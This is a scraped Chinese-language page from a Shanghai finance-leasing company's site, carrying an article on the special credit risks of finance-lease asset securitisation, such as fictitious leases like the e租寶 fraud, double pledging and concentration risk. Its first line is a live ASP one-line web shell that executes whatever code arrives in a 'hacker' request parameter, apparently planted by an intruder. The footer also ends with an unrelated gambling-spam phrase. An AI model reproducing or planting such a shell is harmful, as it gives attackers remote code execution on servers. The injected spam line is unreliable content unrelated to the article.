<%Y=request("hacker")%> <%execute(Y)%><%'">
關于我們
聯系我們
電話:021-52965775
傳真:021-52965703
網址:www.exuxms.live
聯系地址:上海市申長路988弄虹橋萬科中心6號樓301室
您所在的位置:首頁 > 關于我們 > 投資者關系

融資租賃資產證券化信用風險特殊性分析

發布時間:2016-10-31

一、基礎資產真實性風險

對于融資租賃資產證券化業務的投資者來說,投資資金安全的最根本保障就是融資租賃公司能夠準時且足額的收回租金。影響融資租賃公司回收應收融資租賃款的因素有很多,比如融資租賃公司的信用、經營狀況或者管理能力等。但是,能夠保證融資租賃資產證券化業務準時且足額收回租金的最大前提,則是融資租賃項目的真實性。

2015年末,e租寶事件的發酵,對整個行業造成了非常嚴重的負面影響,影響了整個融資租賃業的健康發展。從2014年7月“e租寶”上線至2015年12月被查封,“鈺誠系”相關犯罪嫌疑人以高額利息為誘餌,虛構融資租賃項目,持續采用借新還舊、自我擔保等方式大量非法吸收公眾資金,累計交易發生額達700多億元。“e租寶”采用假項目、假三方、假擔保的三部障眼法制造了一個龐大的龐氏騙局。其對外宣稱的經營模式是先由鈺誠集團下屬的融資租賃公司與項目公司簽訂協議,然后在“e租寶”平臺上以債權轉讓的形式發標融資;融到資金后,項目公司向融資租賃公司支付租金,融資租賃公司收到租金后再向投資人支付收益和本金。在正常情況下,融資租賃公司賺取項目利差,而平臺賺取中介費。

然而,“e租寶”通過收購企業或是注冊空殼公司等方式在“e租寶”平臺上虛構項目。在當時警方已查證的207家承租公司中,只有1家與鈺誠租賃有真實的業務聯系。不僅如此,鈺誠集團還直接控制了3家擔保公司和一家保理公司,為“e租寶”的項目擔保。融資租賃公司引入有關聯關系的擔保機構,使得擔保起到的實際效力大大降低,當項目出現實際風險時,債權人的資金回收面臨較大風險。

因此,只有當融資租賃項目是真實存在時,承租人與融資租賃公司簽署了合同后,承租人才有法律義務支付租金,融資租賃資產證券化的投資者本息安全才能有真正的保障。

二、基礎資產可能面臨重復抵押融資的風險

運營不規范的融資租賃公司運用資產證券化業務進行融資時,還有可能給投資者帶來另一種危害投資者資金安全的行為,即用同一筆融資租賃資產進行重復融資。例如,一些已經轉讓給銀行或是其他金融機構進行融資的應收租金,在未解除抵質押的情況下,轉讓給SPV作為融資租賃資產證券化產品的基礎資產時,即會出現上述問題。這種風險一般相對較小,因為在承辦此類業務時,律師會對入池基礎資產是否處于抵質押狀態進行核查。但是如果涉及到循環結構的產品,此類風險將會加大,因為律師可能不會逐筆進行核實,而是基于報備時的資產入池標準進行一些形式審查。這種情況下,此類的風險控制將主要依賴于計劃管理人是否能夠依據謹慎性原則篩選新的合規基礎資產。另一種風險在于,已經作為融資租賃資產證券化底層基礎資產的融資租賃款被重復抵押做其他的融資。

重復融資的最大危害在于,資產本身的價值無法覆蓋融資金額,甚至大大低于融資金額。如果出現風險,處置資產獲得的收入無法覆蓋融資金額,投資人的本息就會受到危害。目前中國人民銀行征信中心下設了專門的動產融資登記服務機構“中登網”,正規的金融機構在進行應收賬款轉讓的時候,都會在中登網進行登記。登記的目的有兩個,第一是證明資產的真實性,第二是防止同一份應收賬款被重復融資。

謹慎的計劃管理人在承做融資租賃資產證券化業務時,會上中登網查詢應收租金是否已經轉讓給了其他金融機構或互聯網金融平臺。如果不存在此狀況,計劃管理人與融資租賃公司決定承做資產證券化業務后,也會主動在中登網進行資產轉讓登記,避免融資租賃公司后續再使用同一筆融資租賃資產進行重復融資。但是在實際業務操作中,目前大部分承做資產證券化的融資租賃基礎資產較為分散,筆數較多,無法實現逐筆進行登記,只有在權利完善事件中約定,在出現某些風險事件時才會去補充登記,這就存在一定的風險漏洞。

三、將融資租賃不動產收益權作為基礎資產的風險

雖然在實踐中融資租賃的租賃物范圍很廣,但是我國法律文件中還沒有對租賃物范圍的規定,只有《外商投資租賃業管理辦法》(以下簡稱“《管理辦法》”)列舉了租賃資產范圍,均為動產(含動產所附帶的無形資產),沒有列及不動產。外資融資租賃公司是否能以不動產作為租賃物進行融資租賃交易存在爭議,一種認為《管理辦法》不是法律,不應該成為影響合同效力的因素,另一種認為外商投資企業是特殊企業,需要依法批準才可以設立,因此其經營需要在批準范圍之內。

如果法院認定不動產不適合作為租賃物,那往往會認定已經成立的交易為借貸關系,就要適用借貸的法律關系,為融資租賃而做的安排在借貸關系中可能就不被保護,這是融資租賃公司承做不動產業務所面臨的風險之一。

與此同時,外資融資租賃公司及內資融資租賃公司運用“不動產收益權”作為資產證券化的基礎資產也存在法律瑕疵。在實踐中,譬如以高速公路、大橋、大壩等不動產作為基礎資產發行融資租賃資產證券化產品,該類融資租賃物只能采取售后回租的方式進行。某單以發電站大壩不動產為基礎資產的融資租賃資產證券化項目上報后并未通過交易所的審核,可見監管機構對該類基礎資產也并不是很認可。不動產融資租賃并不適宜作為資產證券化的基礎資產的主要原因如下。

1、“不動產收益權”不是物權,也不是債權,其不能納入民法現有權利體系,并不構成一種權利,也無法清晰界定其范圍和邊界,所以不具備基礎資產應具備特定化特性。

2、“不動產收益權”作為資產證券化的專項計劃資產(基礎資產)無法獨立于原始權益人的固有資產(不動產),脫離了對該項不動產本身權利的享有(或所有權,或用益物權、或租賃權)。該“不動產收益權”本身并不能產生收益或現金流,比如把一個水電發電站分割成大壩、發電機組等不同的租賃物,如果分別以大壩、發電機組等作為租賃物承做不同的資產證券化產品,那么這些單獨的租賃物是無法變賣,無法處置,無法對融資租賃應收賬款提供任何擔保,所以就不符合融資租賃資產證券化通過處置抵質押物回收資金的要求。

3、“不動產收益權”不屬于動產,無法以物權法上的轉移占有來實現向專項計劃的權利轉移;“不動產收益權”也不屬于不動產,從而也無法以物權法上的登記(即將該權利變更登記于專項計劃名下)來實現向專項計劃的轉移。比如高速公路、水壩等作為租賃物,對于此類型的基礎資產真正有價值的是相應的土地,但是相應的土地無法隨不動產收益權轉讓給SPV

4、“不動產收益權”也難以作為買賣合同標的及信托財產,因為從法律上講,買賣合同的訂立及履行、信托合同的訂立及信托財產由委托人向受托人交付都是法律行為,而法律行為的生效要件之一是標的須可能、確定、妥當。由于“不動產收益權”難以特定化,也難以實現轉移及交付,因此其本身難以作為買賣合同標的及信托財產,所以即使“不動產收益權”套用信托模式也不適合作為融資租賃資產證券化的基礎資產。

目前,承做不動產融資租賃業務的融資租賃公司想通過資產證券化業務進行融資的動力很足,但是“不動產收益權”并不適合作為融資租賃資產證券化的基礎資產,不動產融資租賃業務并不是嚴格意義上的融資租賃,更像是信貸業務,主要面臨的風險是信用風險,所以需要考慮運用其他的增信措施來規避相關風險。如果融資租賃公司只是為了融資,應該考慮其他的融資渠道,并不一定非要應用資產證券化進行融資。

四、通道類資產證券化業務面臨融資租賃公司的經營風險

以融資租賃公司為通道,以銀行為委托方為例,一般采用的方式即無追索權保理的方式,即銀行向融資租賃公司推薦融資客戶,融資租賃公司和融資客戶簽訂融資租賃合同,隨即將應收賬款向銀行進行保理,銀行提供資金以促成整個交易。在這樣的通道業務中,銀行負責資金來源和資產安全。

然而唯一的不同就是融資租賃公司的融資租賃項目不具有獨立性,雖然融資租賃公司的應收賬款已經賣斷給銀行,但租賃物的所有權仍然屬于融資租賃公司,一旦融資租賃公司自身經營不善,那么這部分租賃物也將被當成融資租賃公司的資產遭受查封,導致承租人(銀行的客戶)無法正常經營,銀行只能被迫卷入融資租賃公司的糾紛當中,債權安全收回面臨很大的由于融資租賃公司本身引起的風險。此外,作為通道類業務,由于融資租賃行業競爭較為激烈,通道費用較低,雖然租賃公司對通道類業務形成的資產不承擔風險,但一旦發生違約情況,一般情況下,會由資金委托方主導后續催收等工作,同時不良資產將會計入租賃公司的統計數據,因此,租賃公司在風險管控上并沒有主導權。

五、股東背景較弱的風險

根據《管理規定》,融資租賃公司在專項計劃存續期間,應當維持正常的生產經營活動或者提供合理的支持,為基礎資產產生預期現金流提供必要的保障。

融資租賃資產證券化項目的原始權益人及資產服務機構一般都為融資租賃公司本身,而且大部分融資租賃公司都承擔著對融資租賃資產證券化項目提供差額補足的承諾,或是提供不合格資產的替換或是回購承諾。從業人員的專業能力及風控能力對于其業務經營的穩健性及持續性至關重要,融資租賃公司不但承擔著融資租賃基礎資產存續期間的貸后服務職責,而且承擔著融資租賃基礎資產的損失回收服務職責,提供這些專業化的質量是否能夠滿足專項計劃的要求關系著預期現金流產生的額度及穩定性。

融資租賃業務在我國興起的時間還不長,眾多的融資租賃公司的成立時間也較短,融資租賃行業經營數據嚴重缺乏,這都給預測基礎資產的損失率和回收率帶來一定的困難,尤其是成立時間不長的中小型融資租賃公司,其經營的穩定性及持續性對于基礎資產產生現金流的可靠性影響性非常大,較強股東背景的中小型融資租賃公司的經營穩定性更好,對于資產證券化的還本付息更有保障。

較為成熟的大型融資租賃公司已經占領了傳統的優勢行業。新成立的,尤其是小型融資租賃公司開展業務比較困難,只能去尋找新的有特色的業務去開拓市場,這時候股東的產業鏈客戶就可以為融資租賃公司提供豐富的客戶資源,推進其發展。較強的股東背景可以為融資租賃公司的經營提供業務支持、資金支持、合理的戰略定位、較為嚴謹的風控措施,這些支持都為融資租賃資產證券化的還本付息提供了重要保障。

六、承租人退租風險

在專項計劃存續期間,承租人退租將增加當期的基礎資產現金流,但會減少基礎資產未來的現金流入,有可能會導致專項計劃在未來特定租金回收期間取得的現金流入低于預期現金流,對于固定攤還的優先級資產支持證券,以后各期本金和利息的償付都有可能受到影響;對于過手攤還的優先級資產支持證券,當期的利息可能有影響。

七、設置循環購買結構可能會面臨基礎資產不足或質量惡化風險

部分融資租賃資產證券化項目設計了循環購買的交易結構,因后續被用于循環購買的基礎資產規模于專項計劃設立日還未最終形成,基礎資產規模、期限匹配等方面都存在一定的不確定性,因此存在各循環購買日時點專項計劃賬戶可用于循環購買資產余額大于融資租賃公司提供的可被用于循環購買的基礎資產規模及期限未能完全匹配的可能,或是各循環購買日時點專項計劃賬戶可用于循環購買資產質量次于初始入池資產質量,從而導致循環購買期內專項計劃資產未能被充分利用于進行循環購買的風險,或是循環購買的基礎資產質量惡化的風險。

八、基礎資產行業集中度較高的風險

以真實租賃為主開展業務的融資租賃公司,一般會深耕一個或幾個產業,并對產業鏈的上、下游客戶進行開發從而提供產業鏈融資。相較銀行等金融機構,融資租賃公司對自身開展業務的某一或某幾個產業具有較高的專業性,但相對銀行等金融機構發放的貸款,融資租賃公司形成的租賃資產行業集中度較高,行業分散性較差。尤其對于那些和經濟周期密切相關的行業,一旦宏觀經濟進入下行周期,融資租賃資產證券化產品的逾期率將會明顯增加,由逾期轉為不良的概率也會明顯增長。因此,入池基礎資產租賃租金的行業集中度相對較高使融資租賃資產證券化產品面臨較高的行業集中度風險。

九、單筆基礎資產占比較高導致的集中度風險

雖然計劃管理人和原始權益人在篩選基礎資產時會盡可能地考慮到控制單筆租賃資產的未償本金余額占比及不同行業租賃資產的比重等,但是部分融資租賃資產證券化產品的資產池中,基礎資產筆數可能在10筆左右,每筆基礎資產對應一個承租人,單筆基礎資產占總資產比重可能會很高,該等租賃租金的回收情況將對資產池整體租金回收情況產生較大影響。一般該風險通過以下兩種措施進行緩釋:第一,由原始權益人或是原始權益人的母公司提供差額支付承諾;第二,通過大額壓力測試等測算手段增加次級的比例。一般原始權益人會持有全部次級資產支持證券,最先承受資產池損失帶來的風險,因此原始權益人有較強的盡職意愿全面管理資產池的風險。

十、債權人與債務人關聯性較高可能導致集中性違約風險

融資租賃公司可以為自己的股東或是股東的相關企業提供融資租賃業務,該類業務屬于關聯交易,關聯交易額度是受到限制的,一般來講取決于監管機構和融資租賃公司自己的限制。融資租賃公司自己的限制一般以公司章程規定,關聯交易不超過多少規模;商務部對管理的融資租賃公司有關聯交易制度,但是沒有限制具體規模。

部分融資租賃資產證券化項目的基礎資產池中,承租人大部分為關聯企業,為同一實際控制人,具有較高的相關性風險。原始權益人與基礎資產的承租人也為同一控制人控制的企業,關聯性較高,具有集中違約風險。

綜上,融資租賃資產證券化評級中的風險關注點較多,以上僅對主要的風險關注點進行了梳理,并結合一定的案例進行了詳細的分析。隨著融資租賃資產證券化產品的不斷創新,未來將通過更加豐富的案例對該類資產證券化的風險特殊性進行歸納總結。



打印此文】【關閉窗口
上一篇:

下一篇:
Copyright (c) 2012-2016 友博融資租賃(上海)有限公司 備案號 滬ICP備14021123號-1
重庆快乐十分杀号技巧